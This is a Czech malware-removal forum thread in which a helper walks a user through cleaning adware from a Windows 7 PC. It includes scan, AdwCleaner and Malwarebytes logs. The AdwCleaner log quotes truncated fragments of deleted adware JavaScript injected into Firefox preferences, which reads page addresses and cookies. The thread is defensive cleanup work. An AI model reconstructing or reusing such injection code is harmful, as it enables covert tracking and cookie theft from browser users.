S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-09-11 124088]
S2 fc67e7a0;DeltaFix; C:\Windows\syswow64\rundll32.exe [2009-07-14 44544]
S2 globalUpdate;globalUpdate Update Service (globalUpdate); C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2015-04-14 68608]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-06 107912]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-04-15 268464]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 Futuremark SystemInfo Service;Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [2014-09-02 614624]
S3 globalUpdatem;globalUpdate Update Service (globalUpdatem); C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2015-04-14 68608]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-06 107912]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2015-03-13 114688]
S3 McComponentHostService;McAfee Security Scan Component Host Service; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [2014-04-09 289256]
S3 Microsoft SharePoint Workspace Audit Service;Microsoft SharePoint Workspace Audit Service; C:\Program Files\Microsoft Office\Office14\GROOVE.EXE [2013-12-19 50942144]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2015-04-07 148080]
S3 NBService;NBService; C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe [2007-06-29 800040]
S3 NMIndexingService;NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [2007-06-27 279848]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 174440]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2014-11-06 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2013-09-11 51808]
S4 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]
S4 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]

-----------------EOF-----------------

[Márty84]

Odinstalujte McAfee Security Scan

Stahnete AdwCleaner https://toolslib.net/downloads/finish/1/ a ulozte ho na plochu.
Ukoncete vsechny programy, jinak to AdwCleaner udela za vas.
Kliknete na nej pravym mysidlem a levym na Spustit jako spravce.
Kliknete na Scan a pockejte, az kontrola dobehne.
Pak kliknete na Cleaning
Program zacne pracovat (muze dojit k restartu pc) a vyplivne log (pripadne bude zde C:\AdwCleaner\AdwCleaner [S?].txt ). Ten mi sem zkopirujte.

[Nomad]

Dobrý večer,


# AdwCleaner v4.201 - Log vytvořen 21/04/2015 v 00:06:18
# Aktualizováno 08/04/2015 by Xplode
# Databáze : 2015-04-20.1 [Server]
# Operační system : Windows 7 Professional Service Pack 1 (x64)
# Uživatelské jméno : Amd - AMD-PC
# Spuštěno z : d:\Users\Amd\Desktop\adwcleaner_4.201.exe
# Nastavení : Čištění

***** [ Služby ] *****

[#] Služba Smazáno : globalUpdate
[#] Služba Smazáno : globalUpdatem
Služba Smazáno : {6507715a-2a05-421f-9b74-91bfdc9da8ad}Gw64
[#] Služba Smazáno : fc67e7a0

***** [ Soubory / Složky ] *****

Složka Smazáno : C:\ProgramData\apn
Složka Smazáno : C:\ProgramData\5dfefc432a5a7aa1
Složka Smazáno : C:\Program Files (x86)\DigiSaver
Složka Smazáno : C:\Program Files (x86)\globalUpdate
Složka Smazáno : C:\Program Files (x86)\DeltaFix
Složka Smazáno : C:\Program Files (x86)\AllCheappPrioce
Složka Smazáno : C:\Program Files (x86)\BestSaveForYoU
Složka Smazáno : C:\Program Files (x86)\CCouppEEXTaensioN
Složka Smazáno : C:\Program Files (x86)\DDownSavE
Složka Smazáno : C:\Program Files (x86)\DownnSaeve
Složka Smazáno : C:\Program Files (x86)\EExstraCoupoNN
Složka Smazáno : C:\Program Files (x86)\Fuun2uSuave
Složka Smazáno : C:\Program Files (x86)\NetioCuouppoon
Složka Smazáno : C:\Program Files (x86)\SaaveeNewaAppz
Složka Smazáno : C:\Program Files (x86)\SaveeLots
Složka Smazáno : C:\Program Files (x86)\SSavELotsa
Složka Smazáno : C:\Program Files (x86)\uniesaaleS
Složka Smazáno : C:\Program Files (x86)\unisaalues
Složka Smazáno : C:\Program Files (x86)\youtubeadblocker
Složka Smazáno : C:\Users\Amd\AppData\Local\globalUpdate
Složka Smazáno : C:\Users\Amd\AppData\Local\GetNowUpdater
Složka Smazáno : C:\Users\Amd\AppData\Roaming\EZDownloader
Složka Smazáno : C:\Users\Amd\AppData\Roaming\com.flash.WidgetBrowser
Složka Smazáno : C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd
Složka Smazáno : C:\Users\Amd\AppData\Roaming\Opera Software\Opera Stable\Extensions\mibfbmhijjgpkmobcfdlelpccpeafoom
Soubor Smazáno : C:\Windows\System32\drivers\{6507715a-2a05-421f-9b74-91bfdc9da8ad}Gw64.sys
Soubor Smazáno : C:\Users\Amd\Uninstall.exe
Soubor Smazáno : d:\Users\Amd\Desktop\Free Games.lnk
Soubor Smazáno : C:\Users\Amd\AppData\Roaming\Mozilla\Firefox\Profiles\3lplb9l2.default\searchplugins\mystartsearch.xml
Soubor Smazáno : C:\Users\Amd\AppData\Roaming\Mozilla\Firefox\Profiles\3lplb9l2.default\user.js

***** [ Naplánované úlohy ] *****

Úloha Smazáno : globalUpdateUpdateTaskMachineCore
Úloha Smazáno : globalUpdateUpdateTaskMachineUA
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-1-6
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-1-7
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-10_user
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-4
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-5
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-5_user
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-6
Úloha Smazáno : c1cd1309-a534-4e58-8dc8-77c454728f30-7
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-1-6
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-1-7
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-10_user
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-4
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-5
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-5_user
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-6
Úloha Smazáno : dbfd5db5-cf23-4227-9665-439089d099b3-7

***** [ Zástupci ] *****


***** [ Registry ] *****

Hodnota Smazáno : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [fftoolbar2014@etech.com]
Klíč Smazáno : HKLM\SOFTWARE\Google\Chrome\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd
Klíč Smazáno : HKLM\SOFTWARE\Google\Chrome\Extensions\mibfbmhijjgpkmobcfdlelpccpeafoom
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdate.OneClickCtrl.10
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdate.Update3WebControl.4
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass.1
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback.1.0
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
Klíč Smazáno : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
Klíč Smazáno : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10
Klíč Smazáno : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4
Klíč Smazáno : HKCU\Software\Mozilla\Extends
Klíč Smazáno : HKLM\SOFTWARE\39e8e84b-67ae-49cd-b767-c16866aac34c
Klíč Smazáno : HKLM\SOFTWARE\fbe30f16-2966-4650-b86e-6a6539f9cb34
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{fc67e7a0}
Klíč Smazáno : HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Klíč Smazáno : HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{4AA46D49-459F-4358-B4D1-169048547C23}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}
Klíč Smazáno : HKLM\SOFTWARE\Classes\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}
Klíč Smazáno : HKLM\SOFTWARE\Classes\Interface\{237FDFDB-3722-470E-8BA8-90196DABE967}
Klíč Smazáno : HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Klíč Smazáno : HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{230332DF-D235-47EE-BC42-60860EF144CD}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{41F978F3-431A-4464-A789-5C0692D562FB}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{5D6736D5-0D77-46CE-9906-C4B2C679BF88}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{DD1CFE82-CC89-497D-9573-B8B1867DDA09}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{E7E31D58-524A-497F-BDA0-7C1B4D0E7D8D}
Klíč Smazáno : HKLM\SOFTWARE\Classes\TypeLib\{FCE74B5F-13A9-47C3-B69E-5210C1EECBEF}
Klíč Smazáno : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč Smazáno : [x64] HKLM\SOFTWARE\Classes\CLSID\{4AA46D49-459F-4358-B4D1-169048547C23}
Klíč Smazáno : [x64] HKLM\SOFTWARE\Classes\Interface\{237FDFDB-3722-470E-8BA8-90196DABE967}
Klíč Smazáno : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Klíč Smazáno : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Klíč Smazáno : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
Klíč Smazáno : HKCU\Software\Driver Pro
Klíč Smazáno : HKCU\Software\GlobalUpdate
Klíč Smazáno : HKCU\Software\InstalledBrowserExtensions
Klíč Smazáno : HKCU\Software\GetnowUpdater
Klíč Smazáno : HKCU\Software\Appscion
Klíč Smazáno : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Klíč Smazáno : HKCU\Software\AppDataLow\Software\Crossrider
Klíč Smazáno : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Klíč Smazáno : HKLM\SOFTWARE\GlobalUpdate
Klíč Smazáno : HKLM\SOFTWARE\InstalledBrowserExtensions
Klíč Smazáno : HKLM\SOFTWARE\mystartsearchSoftware
Klíč Smazáno : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Klíč Smazáno : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Klíč Smazáno : HKU\.DEFAULT\Software\AskPartnerNetwork
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4CEE92A3-9F0C-51AB-ADC0-34EC24AD7B7E}
Klíč Smazáno : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AF992111-52BE-832B-5882-8477E4A3C99A}
Klíč Smazáno : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions

***** [ Prohlížeče ] *****

-\\ Internet Explorer v11.0.9600.17728

Nastavení Obnoveno : HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
Nastavení Obnoveno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
Nastavení Obnoveno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
Nastavení Obnoveno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
Nastavení Obnoveno : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
Nastavení Obnoveno : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
Nastavení Obnoveno : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
Nastavení Obnoveno : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
Nastavení Obnoveno : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]

-\\ Mozilla Firefox v37.0.1 (x86 cs)

[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("browser.search.searchengine.alias", "mystartsearch");
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("browser.search.searchengine.iconURL", "hxxp://www.mystartsearch.com/favicon.ico");
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("browser.search.searchengine.name", "mystartsearch");
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("browser.search.searchengine.url", "hxxp://www.mystartsearch.com/web/?type=ds&ts=1 ... earchTerms}");
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.030jewjTTalRwYPG.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.KRULf8poariI6knv.scode", "(function(){try{if(window.self.location.href.indexOf(\"qjUGqTa7pds9rjr5qdn7pja7ra\")>-1){return;}}catch(e){}try{var d=[[\"acebook\",\"safecart.com\",\"w[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.R3uA7gsyUqhVCNvv.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.SNPEasw934Ackqg3.scode", "(function(){try{if(window.self.location.href.indexOf(\"qjUGqTa7pds9rjr5qdn7pja7ra\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\"[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.T3wmxMrj1NFN0CSQ.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.e3ZQQLLHm5S3ir5y.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.h91MmgNYlLiDLYwD.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.kaKnJL6saZusT30o.scode", "(function(){try{if(window.self.location.href.indexOf(\"qjUGqTa7pds9rjr5qdn7pja7ra\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\"[...]
[3lplb9l2.default\prefs.js] - Řádek Smazáno : user_pref("extensions.ybxlJbjgMYNs25HR.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]

-\\ Google Chrome v39.0.2171.95

[C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Smazáno [Search Provider] : hxxp://www.mystartsearch.com/web/?type=ds&ts=1 ... earchTerms}
[C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Smazáno [Search Provider] : hxxp://www.mystartsearch.com/web/?type=ds&ts=1 ... earchTerms}
[C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Preferences] - Smazáno [Homepage] : hxxp://search.gboxapp.com/
[C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Preferences] - Smazáno [Startup_URLs] : hxxp://search.gboxapp.com/

-\\ Opera v0.0.0.0

[C:\Users\Amd\AppData\Roaming\Opera Software\Opera Stable\Preferences] - Smazáno [Extension] : mibfbmhijjgpkmobcfdlelpccpeafoom

*************************

AdwCleaner[R0].txt - [18406 bytů] - [20/04/2015 09:57:52]
AdwCleaner[R1].txt - [18465 bytů] - [21/04/2015 00:04:39]
AdwCleaner[S0].txt - [16735 bytů] - [21/04/2015 00:06:18]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [16794 bytů] ##########

[Márty84]

Udelejte kontrolu s MBAM. Test nastavte podle tohoto navodu http://forum.viry.cz/viewtopic.php?f=29&t=137928 a dejte sem vysledky. Predem nic nemazte, miva obcas falesne detekce

[Nomad]

Malwarebytes Anti-Malware
www.malwarebytes.org

Datum skenování: 21.4.2015
Čas skenování: 8:41:29
Protokol:
Správce: Ano

Verze: 2.01.4.1018
Databáze malwaru: v2015.04.21.01
Databáze rootkitů: v2015.04.20.01
Licence: Bezplatná verze
Ochrana proti malwaru: Vypnuto
Ochrana proti škodlivým webovým stránkám: Vypnuto
Ochrana programu: Vypnuto

OS: Windows 7 Service Pack 1
CPU: x64
Souborový systém: NTFS
Uživatel: Amd

Typ skenu: Vlastní sken
Výsledek: Dokončeno
Prohledaných objektů: 615110
Uplynulý čas: 1 hod, 25 min, 16 sek

Paměť: Zapnuto
Po spuštění: Zapnuto
Souborový systém: Zapnuto
Archivy: Zapnuto
Rootkity: Vypnuto
Heuristika: Zapnuto
PUP: Zapnuto
PUM: Zapnuto

Procesy: 0
(Nenalezeny žádné škodlivé položky)

Moduly: 0
(Nenalezeny žádné škodlivé položky)

Klíče registru: 31
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\CLSID\{cd885aa1-4e60-499c-b5cc-e66db16412ed}, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.Pcd885aa1_4e60_499c_b5cc_e66db16412ed_, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.9, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.Pcd885aa1_4e60_499c_b5cc_e66db16412ed_, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.9, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.Pcd885aa1_4e60_499c_b5cc_e66db16412ed_, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.Pcd885aa1_4e60_499c_b5cc_e66db16412ed_.9, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\CLSID\{cc442813-6579-4f68-a312-e9c769c048ce}, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\Pcc442813_6579_4f68_a312_e9c769c048ce_.Pcc442813_6579_4f68_a312_e9c769c048ce_, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\Pcc442813_6579_4f68_a312_e9c769c048ce_.Pcc442813_6579_4f68_a312_e9c769c048ce_.9, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Pcc442813_6579_4f68_a312_e9c769c048ce_.Pcc442813_6579_4f68_a312_e9c769c048ce_, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Pcc442813_6579_4f68_a312_e9c769c048ce_.Pcc442813_6579_4f68_a312_e9c769c048ce_.9, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Pcc442813_6579_4f68_a312_e9c769c048ce_.Pcc442813_6579_4f68_a312_e9c769c048ce_, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Pcc442813_6579_4f68_a312_e9c769c048ce_.Pcc442813_6579_4f68_a312_e9c769c048ce_.9, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\CLSID\{aeb94dbd-393f-465d-b99b-bdcdcf131507}, , [59dcff70b1d938fe0195cf65fd05bb45],
